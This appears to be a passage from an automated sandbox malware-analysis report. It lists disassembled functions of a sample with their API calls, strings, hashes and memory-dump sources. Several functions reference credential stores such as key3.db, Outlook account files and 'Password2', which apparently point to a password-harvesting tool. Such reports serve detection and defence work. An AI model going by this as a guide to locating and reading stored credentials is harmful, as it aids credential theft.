Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD59, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42

GetStdHandle.KERNEL32(000000F5,00000000,00000000,0044551F,0044551F,?,0040CC56,0044551F,00000000,00000000,?,00000000,00000000,?,?), ref: 0040AD80
CloseHandle.KERNEL32(00000000,0040CC56,0044551F,00000000,00000000,?,00000000,00000000,?,?,?,0040CD7F), ref: 0040AE78
SetCursor.USER32(0040CC56,0044551F,00000000,00000000,?,00000000,00000000,?,?,?,0040CD7F), ref: 0040AE84

Part of subcall function 00406AB8: CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040AD7B,00000000,00000000,00000000,0044551F,0044551F,?,0040CC56,0044551F), ref: 00406ACA

Part of subcall function 00406B15: GetLastError.KERNEL32(?), ref: 00406B25
Part of subcall function 00406B15: sprintf.MSVCRT ref: 00406B4D
Part of subcall function 00406B15: MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406B66

Strings

Mxt, xrefs: 0040AE45, 0040AE54

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Handle$??2@??3@CloseCreateCursorErrorFileLastMessagesprintf
String ID: Mxt
API String ID: 3976026410-3818084670
Opcode ID: 7c6e617f3a136afb2afea694185ad649bdd6ff3a7bc0620a4bd3453871937a5a
Instruction ID: 46d72cb5dc087768f4545a4cfae5af934c8abfb027778568e6924f5a5de93ef0
Opcode Fuzzy Hash: 7c6e617f3a136afb2afea694185ad649bdd6ff3a7bc0620a4bd3453871937a5a
Instruction Fuzzy Hash: 7E418371700300AFDB21AF69C888F5E77F6AF45711F21406AF446A72E1CB389D90CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00407A4B, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 004076D7: ??3@YAXPAX@Z.MSVCRT ref: 004076DA
Part of subcall function 004076D7: ??3@YAXPAX@Z.MSVCRT ref: 004076E2

??3@YAXPAX@Z.MSVCRT ref: 00407B0B

Part of subcall function 004077AE: ??3@YAXPAX@Z.MSVCRT ref: 004077BD

Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B

Strings

Mxt, xrefs: 00407A91, 00407B2C
Mxt, xrefs: 00407A86, 00407B34
Mxt, xrefs: 00407B5F

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@$mallocmemcpy
String ID: Mxt$Mxt$Mxt
API String ID: 603196995-884834091
Opcode ID: 8a3836bf090716401940d4b91efd330067c8b30f89c7a6021675a53e82e5a6ab
Instruction ID: 41f89c0a15dd94f0a2632267f5936c9b74ff5c7e63de2c36d6bf8b312d374bad
Opcode Fuzzy Hash: 8a3836bf090716401940d4b91efd330067c8b30f89c7a6021675a53e82e5a6ab
Instruction Fuzzy Hash: C7513A75D08119AFCB10DF99C48089EFBB1BF54318B64807BE951B7381C738BA45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004140D3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414105

Strings

winTruncate1, xrefs: 00414175
winSeekFile, xrefs: 0041415B
winTruncate2, xrefs: 004141AE

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: winSeekFile$winTruncate1$winTruncate2
API String ID: 885266447-2471937615
Opcode ID: 2e15f3014d93f2bb9130e9841e4fb77219e446d9f82deb2689d2d98ee362e802
Instruction ID: 64d4eb81a265c1b05a2fdfc4674ac580571b80d59954343c28d6466173863d6d
Opcode Fuzzy Hash: 2e15f3014d93f2bb9130e9841e4fb77219e446d9f82deb2689d2d98ee362e802
Instruction Fuzzy Hash: 0331E1B1240700BFE7209F65CC49AA7B7E9FB94714F144A2EF951836C1E738EC948B69

Uniqueness

Uniqueness Score: -1.00%

Function 00406868, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1

GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
CloseHandle.KERNEL32(?), ref: 004068B2

Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6

Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306

Strings

C@, xrefs: 00406868
key3.db, xrefs: 0040686D

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: File$??2@??3@CloseCreateHandleReadSize
String ID: C@$key3.db
API String ID: 1968906679-1993167907
Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409669, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409682
SendMessageA.USER32(?,00001019,00000000,?), ref: 004096B0

Strings

lD, xrefs: 00409670
", xrefs: 004096A9

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: MessageSendmemset
String ID: "$lD
API String ID: 568519121-3281613384
Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF

CreateFontIndirectA.GDI32(?), ref: 0040101F
SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B

Strings

MS Sans Serif, xrefs: 0040100B

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
String ID: MS Sans Serif
API String ID: 3492281209-168460110
Opcode ID: 52dc321bffbe8d9edfbbd6a187ed283ebc7fee85da995f87e7fe45cbab2b246e
Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
Opcode Fuzzy Hash: 52dc321bffbe8d9edfbbd6a187ed283ebc7fee85da995f87e7fe45cbab2b246e
Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00406EA5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406EC5
GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
_strcmpi.MSVCRT ref: 00406EEA

Strings

edit, xrefs: 00406EE4

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ClassName_strcmpimemset
String ID: edit
API String ID: 275601554-2167791130
Opcode ID: 5afe02c50ff8787005bc22e72224c46649f7fc71878b60a9ecbad1c5cb2a62e5
Instruction ID: 847e1e856ca93c5331a43762777f09d1dcd0b535ae5450603ebfd434222f9f24
Opcode Fuzzy Hash: 5afe02c50ff8787005bc22e72224c46649f7fc71878b60a9ecbad1c5cb2a62e5
Instruction Fuzzy Hash: A3E09B73C5412E7AEB21B6A4DC01FE6776CEF55705F0000F7B945E10C1E5B45A888B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040732D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040732F
strlen.MSVCRT ref: 0040733A
_mbscat.MSVCRT ref: 00407351

Strings

8D, xrefs: 0040734A

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_mbscat
String ID: 8D
API String ID: 3951308622-2703402624
Opcode ID: 0d4b8226fbd496cbfb2f65cef8605315bd67d0e3db655489d156a20edcf200cd
Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
Opcode Fuzzy Hash: 0d4b8226fbd496cbfb2f65cef8605315bd67d0e3db655489d156a20edcf200cd
Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D

Uniqueness

Uniqueness Score: -1.00%

Function 00443131, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 0044313C
_mbscat.MSVCRT ref: 00443147
_mbscat.MSVCRT ref: 00443152

Strings

Password2, xrefs: 0044314C

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscat$_mbscpy
String ID: Password2
API String ID: 2600922555-1856559283
Opcode ID: 125e7d14fb5ca2ce57f65db2f514a3b406a0f280798a99ea75b84c206dc306df
Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
Opcode Fuzzy Hash: 125e7d14fb5ca2ce57f65db2f514a3b406a0f280798a99ea75b84c206dc306df
Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE

Uniqueness

Uniqueness Score: -1.00%

Function 00407159, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EC), ref: 0040715F
SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 00407171

Strings

MZ@, xrefs: 00407165
v, xrefs: 0040715F

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: LongWindow
String ID: MZ@$v
API String ID: 1378638983-4209327180
Opcode ID: 62d406e91696c119d1ef4349822734d3511295de081a498f539da8bd6014a39e
Instruction ID: 804470ff31f0757d593f161739aa594d3f3a9703a836b83944ab3f82d4068dae
Opcode Fuzzy Hash: 62d406e91696c119d1ef4349822734d3511295de081a498f539da8bd6014a39e
Instruction Fuzzy Hash: 55C0123015C4176BCF001B24EC05E163E54B782321F2047717067D00F2C7704400A904

Uniqueness

Uniqueness Score: -1.00%

Function 0041067E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(shell32.dll,0040CC91,74784DE0,?,00000000), ref: 0041068C
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1

Strings

SHGetSpecialFolderPathA, xrefs: 0041069B
shell32.dll, xrefs: 00410687

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathA$shell32.dll
API String ID: 2574300362-543337301
Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D

Uniqueness

Uniqueness Score: -1.00%

Function 00431CB5, Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 469COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00431CEC
memset.MSVCRT ref: 00431DA2
memset.MSVCRT ref: 00431F62

Strings

rows deleted, xrefs: 004321AB

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset
String ID: rows deleted
API String ID: 2221118986-571615504
Opcode ID: 86ee5ca529122ecb493de3f8224b228ed87d459d860e95d1f11cf094ac722bb9
Instruction ID: 2c87624536f7d1d2c67b3f30ed48d8bcf82a012ac595ca9270874480dc5e5985
Opcode Fuzzy Hash: 86ee5ca529122ecb493de3f8224b228ed87d459d860e95d1f11cf094ac722bb9
Instruction Fuzzy Hash: 47028F71E00218AFDF14DF99DD81AAEBBB5EF08314F14005AFA04A7352E775AD41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041B58C, Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041B59F
memcpy.MSVCRT ref: 0041B5B5
memcmp.MSVCRT ref: 0041B5C4
memcmp.MSVCRT ref: 0041B60C
memcpy.MSVCRT ref: 0041B627

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy$memcmp
String ID:
API String ID: 3384217055-0
Opcode ID: 6479a8cbaec187bbaa1d3d6a314cff3b659787f9331dd23b7db95fb231ff0ef6
Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
Opcode Fuzzy Hash: 6479a8cbaec187bbaa1d3d6a314cff3b659787f9331dd23b7db95fb231ff0ef6
Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765

Uniqueness

Uniqueness Score: -1.00%

Function 00442878, Relevance: 6.3, APIs: 5, Instructions: 81COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0044288D
??2@YAPAXI@Z.MSVCRT ref: 004428AB
??2@YAPAXI@Z.MSVCRT ref: 004428C6
??2@YAPAXI@Z.MSVCRT ref: 004428EF
??2@YAPAXI@Z.MSVCRT ref: 00442913

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 4f02d492932157ca99fe01ec3e0f2f4a58aad1fd642da071f880912a89b5d5b2
Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
Opcode Fuzzy Hash: 4f02d492932157ca99fe01ec3e0f2f4a58aad1fd642da071f880912a89b5d5b2
Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00404883, Relevance: 6.3, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004048BD
memset.MSVCRT ref: 004048D1
memset.MSVCRT ref: 004048E5
memcpy.MSVCRT ref: 004048F7
memcpy.MSVCRT ref: 00404909

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64

Uniqueness

Uniqueness Score: -1.00%

Function 0041546A, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004154B0

Strings

winOpen, xrefs: 004155DF
psow, xrefs: 00415690
+MA, xrefs: 00415471, 0041562F, 00415599, 00415567, 0041549D

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset
String ID: +MA$psow$winOpen
API String ID: 2221118986-3077801942
Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98

Uniqueness

Uniqueness Score: -1.00%

Function 00424EAC, Relevance: 6.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00424F52
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00424F87
__allrem.LIBCMT ref: 00425035
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042507D

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 560e0d92d15042a7d60853a487a4d693223dca75a8103b8e7d816dd0a212d02a
Instruction ID: db9e41318fbfcada45bb9adf36b3998ede89feacb8141746dd807fa43e705e13
Opcode Fuzzy Hash: 560e0d92d15042a7d60853a487a4d693223dca75a8103b8e7d816dd0a212d02a
Instruction Fuzzy Hash: 65618F71E006299FCF14CFA4ED40AAEBBB1FF84314F69415AE508AB391DB399D41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004259D5, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00425AA4

Strings

SA, xrefs: 00425A39, 00425A85
^SA, xrefs: 00425B61
2RA, xrefs: 004259F3

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset
String ID: SA$2RA$^SA
API String ID: 2221118986-2230555252
Opcode ID: 94fec3ee7f14761859cdfc1adb7fa2719d7e6e85046d80aeefeb63c9a27c0577
Instruction ID: 83eed2edbd6a4b57faa0eef3d6399dc74c794a5d3b7d61bc5c9c0664910adea4
Opcode Fuzzy Hash: 94fec3ee7f14761859cdfc1adb7fa2719d7e6e85046d80aeefeb63c9a27c0577
Instruction Fuzzy Hash: E5714871E00629DFCB14CF99E4819ADBBB1FF08314F94419AE805A7741D738B982CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0042BB86, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042BCE8

Strings

variable number must be between ?1 and ?%d, xrefs: 0042BC19
too many SQL variables, xrefs: 0042BD54

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset
String ID: too many SQL variables$variable number must be between ?1 and ?%d
API String ID: 2221118986-515162456
Opcode ID: 20167e18f5bde3c5300384d7b0c4e4bda489b672db3c311406fc9ab3445b353f
Instruction ID: 0d9164a1fdbde5ca3cdd745d30cfe3dc8f536e44641e3c26b790e655cd3eaffd
Opcode Fuzzy Hash: 20167e18f5bde3c5300384d7b0c4e4bda489b672db3c311406fc9ab3445b353f
Instruction Fuzzy Hash: 71519D31B00525EFEB19DF69D481BEAB7A0FF08304F90016BE815AB251DB79AD51CBC8

Uniqueness

Uniqueness Score: -1.00%

Function 0042F55D, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 143COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042F6A9

Strings

, , xrefs: 0042F5DB
, xrefs: 0042F5D4
CREATE TABLE , xrefs: 0042F616

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: $, $CREATE TABLE
API String ID: 3510742995-3459038510
Opcode ID: 0432a8d87e201afa4649bad522043fdff9df827ab5537bbea560a9cb4ea18ead
Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
Opcode Fuzzy Hash: 0432a8d87e201afa4649bad522043fdff9df827ab5537bbea560a9cb4ea18ead
Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99

Uniqueness

Uniqueness Score: -1.00%

Function 004259DC, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 130COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00425AA4

Strings

SA, xrefs: 00425A39, 00425A85
^SA, xrefs: 00425B61
2RA, xrefs: 004259F3

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset
String ID: SA$2RA$^SA
API String ID: 2221118986-2230555252
Opcode ID: 6c42f8cff92a37d6c475df0d1b5e92a07e181a09769f4f6dcd041eb2ba3ab943
Instruction ID: b845bdc21032cee7804c0107577da234bbd010e7dc5c2eee2366ad40d606eaab
Opcode Fuzzy Hash: 6c42f8cff92a37d6c475df0d1b5e92a07e181a09769f4f6dcd041eb2ba3ab943
Instruction Fuzzy Hash: C1511771A00A2ADFCB14CF59E481AADBBB1FF08314F94419AD845E7700E739B981CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00402616, Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
memset.MSVCRT ref: 0040269F

Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
LocalFree.KERNEL32(?), ref: 00402798

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
String ID:
API String ID: 1593657333-0
Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5D8, Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C642
SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Message$MenuPostSendStringmemset
String ID:
API String ID: 3798638045-0
Opcode ID: 5d3faed44ea898e8e23d61f3db23705dd0554933dd7cb264d30f90e1c753db93
Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
Opcode Fuzzy Hash: 5d3faed44ea898e8e23d61f3db23705dd0554933dd7cb264d30f90e1c753db93
Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8

Uniqueness

